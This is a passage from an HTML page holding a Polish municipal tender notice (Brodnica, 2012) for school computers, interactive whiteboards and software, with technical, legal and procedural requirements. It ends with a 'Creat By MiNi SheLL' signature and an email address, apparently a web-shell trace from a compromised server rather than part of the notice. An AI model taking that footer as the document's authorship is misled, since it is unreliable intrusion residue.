tablicy po podłączeniu urządzenia do komputera, umożliwiająca bezpośrednią prezentację filmowanego ruchomego obrazu z poziomu oprogramowania dostarczanego z tablicą oraz przechwycenie nieruchomego obrazu i wstawienie go jako obiektu do ww. programu
 możliwość sterowania funkcjami wizualizera (regulacja stopnia powiększenia, regulacja jasności, regulacja ostrości i funkcja auto fokus) z poziomu oprogramowania dostarczanego z tablicą
 funkcja narzędzi rzeczywistości mieszanej pozwalająca manipulować modelami 3D umieszczonymi w programie dostarczanym wraz z tablicą za pomocą kostki dostarczanej wraz z wizualizerem
	waga nie większa niż 5 kg
	gwarancja na okres nie krótszy niż 3 lata 

9.2. Wymagania ogólne

1. Pomoce dydaktyczne muszą spełniać następujące warunki:
1) posiadać deklarację CE;
2) posiadać certyfikat ISO 9001 dla producenta sprzętu;
3) w przypadku komputerów przenośnych - spełniać wymogi normy Energy Star 5.0;
4) być wyprodukowane w 2012 r. fabrycznie nowe i wolne od obciążeń prawami osób trzecich;
5) posiadać dołączone niezbędne instrukcje i materiały dotyczące użytkowania, w języku polskim;
6) posiadać okres gwarancji udzielonej przez dostawcę nie krótszy niż 3 lata, a w przypadku tablic interaktywnych - nie krótszy niż 5 lat. 
7) zagwarantowana możliwość bezpłatnej aktualizacji oprogramowania antywirusowego na okres min. 3 lat 
8) zagwarantowana możliwość bezpłatnej aktualizacji oprogramowania zabezpieczającego przed kradzieżą komputery uczniowskie i nauczycielskie na okres min. 3 lat

2. Oprogramowanie biurowe przenośnego komputera uczniowskiego i nauczycielskiego
1) zintegrowany pakiet aplikacji biurowych musi zawierać co najmniej:
 edytor tekstów
 arkusz kalkulacyjny
 narzędzie do przygotowywania i prowadzenia prezentacji
 narzędzie do zarządzania informacją osobistą (pocztą elektroniczną, kalendarzem, kontaktami i zadaniami)
 zainstalowanie na jednym komputerze produktów pochodzących od różnych producentów nie jest uznane za ofertę zintegrowanego pakietu
2) pełna polska wersja językowa interfejsu użytkownika, w tym także systemu interaktywnej pomocy w języku polskim
3) pakiet biurowy powinien mieć system aktualizacji darmowych poprawek bezpieczeństwa, przy czym komunikacja z użytkownikiem powinna odbywać się w języku polskim
4) dostępność w Internecie na stronach producenta biuletynów technicznych, w tym opisów poprawek bezpieczeństwa, w języku polskim, a także telefonicznej pomocy technicznej producenta pakietu biurowego świadczonej w języku polskim w dni robocze w godzinach od 8-19 - cena połączenia nie większa niż cena połączenia lokalnego
5) pakiet musi mieć publicznie znany cykl życia przedstawiony przez producenta,
dotyczący rozwoju i wsparcia technicznego - w szczególności w zakresie bezpieczeństwa -co najmniej na 5 lat od daty zakupu 
6) możliwość dostosowania pakietu aplikacji biurowych do pracy dla osób niepełnosprawnych np. słabo widzących, zgodnie z wymogami Krajowych Ram Interoperacyjności (WCAG 2.0)
7) pakiet aplikacji biurowych powinien obsługiwać formaty dokumentów wymienione w Krajowych Ramach Interoperacyjności
8) pakiet aplikacji biurowych powinien prawidłowo współpracować z aplikacjami w modelu chmury obliczeniowej, w szczególności do pracy grupowej i synchronizacji danych
9) rozpoznawać sieci i ich ustawienia bezpieczeństwa, rozpoznawać automatycznie urządzenia peryferyjne działające w tej sieci (np. drukarki, tablice interaktywne) oraz łączyć się automatycznie z raz zdefiniowanymi sieciami.

3. System operacyjny dla komputera uczniowskiego i nauczycielskiego
1) system operacyjny z graficznym interfejsem użytkownika w języku polskim, w tym także system interaktywnej pomocy w języku polskim. Zlokalizowane w języku polskim co najmniej następujące elementy: menu, odtwarzacz multimediów, pomoc, komunikaty systemowa
2) system operacyjny posiada zintegrowany system aktualizacji darmowych poprawek bezpieczeństwa a komunikacja z użytkownikiem w języku polskim
3) możliwość zdalnej automatycznej instalacji, konfiguracji, administrowania oraz aktualizacji systemu
4) dostępność bezpłatnej telefonicznej pomocy technicznej dotyczącej systemu operacyjnego świadczonej w języku polskim u producenta sprzętu komputerowego (związane z problemami współdziałania sprzętu i systemu operacyjnego) - cena połączenia nie większa niż cena połączenia lokalnego
5) dostępność w Internecie na stronach producenta biuletynów technicznych, w tym opisów poprawek bezpieczeństwa w języku polskim, a także telefonicznej pomocy technicznej producenta systemu operacyjnego świadczonej w języku polskim w dni robocze w godzinach od 8,00-19,00 - cena połączenia nie większa niż cena połączenia lokalnego
6) system operacyjny musi być publicznie znany, cykl życia przedstawiony przez producenta i dotyczący rozwoju i wsparcia technicznego - w szczególności w zakresie bezpieczeństwa - co najmniej na 5 lat od daty zakupu
7) możliwość dostosowania do pracy dla osób niepełnosprawnych np. słabowidzących zgodnie z wymogami Krajowych Ram Inetroperacyjności (WCAG2.0)
8) system operacyjny musi pozwalać na system operacyjny musi pozwalać na pracę w różnych sieciach komputerowych (sieci lokalne LAN, Internet), w tym także automatycznie rozpoznawać sieci i ich ustawienia bezpieczeństwa, rozpoznawać automatycznie urządzenia peryferyjne działające w tej sieci (np. drukarki, tablice interaktywne) oraz łączyć się automatycznie z raz zdefiniowanymi sieciami
9) system operacyjny komputera nauczycielskiego powinien pozwalać na uruchomienie niezbędnych aplikacji i przyłączenie się do odpowiednich sieci w Systemie Informacji Oświatowej
10) system operacyjny przystosowany do pracy z aplikacjami w modelu chmury obliczeniowej, w szczególności do pracy grupowej i synchronizacji danych (także: przechowywania kopii rezerwowych danych w chmurze obliczeniowej)
11) system operacyjny pozwalający na wdrożenie jednolitej polityki bezpieczeństwa dla wszystkich komputerów w sieci szkolnej

4. Dostarczony sprzęt musi zachować pełną kompatybilność produktów cząstkowych wchodzących w skład rozwiązania informatycznego w całym okresie ich użytkowania

9.3. Wymagania dotyczące dostawcy
1. Oferent musi posiadać pracownika posiadającego wiedzę z zakresu czynności wdrożenia potwierdzone certyfikatami producentów z zakresu proponowanego systemu operacyjnego oraz proponowanych środowisk wirtualnych. Dane personalne ww. pracownika wraz z wymienionymi certyfikatami producentów Wykonawca zobowiązany jest dostarczyć przed podpisaniem umowy.
2. Dostawca zapewnia montaż pomocy dydaktycznych, sprzętu komputerowego i oprogramowania.
3. Dostawca zapewnia techniczne szkolenie nauczycieli w zakresie obsługi sprzętu.
4. Dostawca przekaże szkole nieodpłatnie programy edukacyjne do nauczania w szkole podstawowej w klasach IV-VI..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1, 30.23.20.00-4, 39.16.00.00-1, 39.16.20.00-5, 32.34.00.00-8, 32.34.24.12-3, 32.41.00.00-0, 32.41.30.00-1, 32.41.31.00-2, 32.41.80.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Doświadczenie zawodowe - wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, co najmniej jednej (1) dostawy w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wykonawca musi wykazać, że wykonał lub wykonuje, co najmniej jedno (1) zadanie o charakterze i złożoności porównywalnej z przedmiotem zamówienia tj., w zakresie dostawy sprzętu komputerowego, przy czym wartość tego pojedynczego zamówienia winna wynosić, co najmniej 100.000,00 PLN brutto. Należy podać ich wartość, przedmiot oraz daty wykonania i odbiorców oraz załączyć dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie - wg załącznika Nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem niniejszego zamówienia - wartość ubezpieczenia powinna wynosić, co najmniej 100.000,00 PLN brutto.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - wg załącznika Nr 1 do SIWZ.
	Oświadczenie w trybie art. 22 ust.1 od pkt 1 do pkt 4, art. 24 ust. 1 pkt 1-11 oraz art. 24 ust. 2 na podstawie ustawy z dnia 29 stycznia 2004r z poźn. zmianami - Prawo zamówień publicznych - wg załącznika Nr 2 do SIWZ.
	Oświadczenie o akceptowaniu warunków określonych w SIWZ i nie zgłaszaniu zastrzeżeń, co do przedmiotu zamówienia - wg załącznika Nr 3 do SIWZ.
	Informacje ogólne o wykonawcy - wg załącznika Nr 4 do SIWZ.
	Zaparafowany projekt umowy - wg załącznika Nr 5 do SIWZ. 
	Oświadczenie, iż przedmiot zamówienia jest fabrycznie nowy oraz posiada wymagane prawem normy, deklaracje oraz certyfikaty - wg załącznika Nr 6 do SIWZ.
 	W przypadku ofert równoważnych - należy dołączyć deklaracje, certyfikaty, specyfikację techniczną oraz informacje o produkcie w formie opisu lub ulotki w języku polskim, zawierające wszystkie dane potwierdzające, że przedmiot zamówienia spełnia wymogi określone w SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający zastrzega możliwość zmiany zawartej umowy w stosunku do treści oferty na mocy art. 144 ust. 1 ustawy - Prawo zamówień publicznych. 
Zamawiający określa następujące warunki, w jakich dopuszcza możliwość dokonania zmian niniejszej umowy:
1.)	konieczności zmiany umownego terminu realizacji zamówienia z powodu:
a)	działania siły wyższej, przez którą rozumieć należy zdarzenie zewnętrzne o charakterze niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem umowy, którego nie można uniknąć, ani któremu strony nie mogły zapobiec przy zachowaniu należytej staranności, której nie można przypisać drugiej stronie. Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, pożar i inne klęski żywiołowe, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia,
b)	zaistnienia okoliczności leżących po stronie zamawiającego, w szczególności spowodowanych problemami z jego zdolnością płatniczą lub warunkami organizacyjnymi lub okolicznościami, które nie były możliwe do przewidzenia w chwili zawarcia umowy,
2.)	z powodu zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia lub świadczenia stron,
3.)	z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez zamawiającego lub wykonawcę, jeżeli te zmiany są korzystne dla zamawiającego;
4.)	z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie. 
       Każdorazowa zmiana umowy będzie potwierdzona pisemnie, czyli stosownym aneksem.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.brodnica.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Brodnicy, ul. Kamionka 23, 87-300 Brodnica w pokoju 207.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.08.2012 godzina 10:00, miejsce: Urząd Miejski w Brodnicy, ul. Kamionka 23, 87-300 Brodnica w pokoju 211 lub drogą pocztową na adres siedziby zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com